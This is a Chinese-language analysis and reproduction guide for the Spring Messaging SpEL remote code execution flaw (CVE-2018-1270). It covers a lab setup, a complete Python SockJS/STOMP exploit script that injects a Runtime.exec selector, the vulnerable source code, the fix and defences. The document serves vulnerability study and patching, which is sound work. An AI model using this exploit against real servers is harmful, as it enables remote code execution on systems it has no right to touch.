CVE-2018-1270 spring-messaging RCE 深入分析
字数 1558 2025-08-22 12:22:37
Spring Messaging RCE漏洞(CVE-2018-1270)深入分析与复现指南
1. 漏洞概述
漏洞编号: CVE-2018-1270
影响组件: Spring Messaging
漏洞类型: 远程代码执行(RCE)
CVSS评分: 高危
影响版本: Spring Framework 5.0.x < 5.0.5, 4.3.x < 4.3.15
1.1 漏洞背景
Spring Messaging为Spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS。在该组件中,允许客户端订阅消息并使用selector过滤消息。selector使用SpEL表达式编写,并使用StandardEvaluationContext解析,导致命令执行漏洞。
2. 环境搭建
2.1 使用Vulhub环境
- 从Docker容器中复制出jar包
- 添加远程调试参数启动应用:
java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar ws.jar
2.2 调试注意事项
- 可能遇到字节码不匹配问题
- 需要将jar包中的lib目录复制出来并"Add as Library"
3. 漏洞复现
3.1 漏洞利用脚本分析
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def random_str(length):
letters = string.ascii_lowercase + string.digits
return ''.join(random.choice(letters) for c in range(length))
class SockJS(threading.Thread):
def __init__(self, url, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
self.daemon = True
self.session = requests.session()
self.session.headers = {
'Referer': url,
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
}
self.t = int(time.time() * 1000)
def run(self):
url = f'{self.base}/htmlfile?c=_jp.vulhub'
response = self.session.get(url, stream=True)
for line in response.iter_lines():
time.sleep(0.5)
def send(self, command, headers, body=''):
data = [command.upper(), '\n']
data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
data.append('\n\n')
data.append(body)
data.append('\x00')
data = json.dumps([''.join(data)])
response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
if response.status_code != 204:
logging.info(f"send '{command}' data error.")
else:
logging.info(f"send '{command}' data success.")
def __del__(self):
self.session.close()
sockjs = SockJS('http://127.0.0.1:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
sockjs.send('connect', {
'accept-version': '1.1,1.0',
'heart-beat': '10000,10000'
})
s = input()
sockjs.send('subscribe', {
'selector': "T(java.lang.Runtime).getRuntime().exec('open -a Calculator')",
'id': 'sub-0',
'destination': '/topic/greetings'
})
s = input()
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
'content-length': len(data),
'destination': '/app/hello'
}, data)
s = input()
3.2 攻击流程
- 连接(connect): 建立WebSocket连接
- 订阅(subscribe): 发送包含恶意SpEL表达式的selector
- 发送(send): 触发SpEL表达式解析执行
4. 漏洞原理分析
4.1 关键代码分析
漏洞触发点在DefaultSubscriptionRegistry.class的144行:
Expression expression = sub.getSelectorExpression();
if (expression == null) {
result.add(sessionId, subId);
} else {
if (context == null) {
context = new StandardEvaluationContext(message);
context.getPropertyAccessors().add(new SimpMessageHeaderPropertyAccessor());
}
try {
if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) {
result.add(sessionId, subId);
}
}
// ...
}
4.2 调用栈分析
SimpleBrokerMessageHandler.handleMessageInternal(): 处理消息类型DefaultSubscriptionRegistry.addSubscriptionInternal(): 添加订阅DefaultSubscriptionRegistry.filterSubscriptions(): 过滤订阅时解析SpEL
4.3 触发条件
- 消息类型为
SUBSCRIBE - 包含
selector这个NativeHeader - selector值为SpEL表达式
5. STOMP协议与Selector设计
5.1 STOMP协议基础
STOMP(Simple Text Oriented Messaging Protocol)是一种简单的、基于文本的消息协议,格式类似HTTP:
COMMAND
header1:value1
header2:value2
Body^@
5.2 Selector设计背景
2015年4月3日有人提出issue请求增加selector支持,官方在4月22日通过commit b6327a加入SpEL的selector header支持。
设计目的: 允许客户端基于消息内容过滤订阅,避免使用重量级消息代理。
6. 漏洞修复方案
6.1 修复方式
将StandardEvaluationContext替换为SimpleEvaluationContext:
StandardEvaluationContext: 可执行任意SpEL表达式SimpleEvaluationContext: 不支持Java类型引用、构造函数及bean引用
6.2 修复版本
- Spring Framework 5.0.5+
- Spring Framework 4.3.15+
7. 防御措施
- 升级到安全版本
- 禁用不必要的STOMP端点
- 实施网络隔离,限制WebSocket访问
- 使用WAF拦截恶意SpEL表达式